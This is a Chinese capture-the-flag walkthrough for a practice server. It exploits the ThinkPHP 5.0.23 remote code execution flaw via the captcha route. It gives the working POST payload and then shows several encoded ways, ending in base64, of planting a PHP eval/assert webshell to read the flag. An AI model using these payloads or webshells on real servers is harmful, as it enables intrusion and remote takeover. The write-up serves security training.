ThinkPHP5.0.23 远程代码执行漏洞

靶场地址【安鸾渗透实战平台】http://www.whalwl.cn:8031

提示：flag在服务器根目录

直接在kali里面搜索ThinkPHP5.0.23相关漏洞

发现了 Remote Code Execution（远程代码执行漏洞）

将该漏洞cp到tp.txt文件并查看

在最下面发现该版本payload

（post）public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

由于是post传参，所以用burp抓包或者浏览器插件

我们先访问到/index.php?s=captcha

然后通过post传参将payload写入并执行

执行成功

使用phpinfo函数验证_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

‘<?php @eval($_POST[\'a\']);?>’;file_put_contents(‘shell.php’,&a);echo ‘ok’;

我们创建一个shell2.php文件touch shell2.php

向其中写入一句话木马echo “<?php @eval($_POST[\'a\']);?>” >shell2.php

但是访问的时候出现错误

尝试编码执行echo “%3c%3fphp+%40eval(%24_POST%5b123%5d)%3b%3f%3e” > shell2.php

仍然连接失败

尝试使用base64编码写入并且使用assert代替eval

aaa<?php @assert($_POST['xss']);?>bbb

YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg==

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell9.php

成功解析

使用蚁剑连接
注意要使用chr或者base64

在服务器跟目录发现flag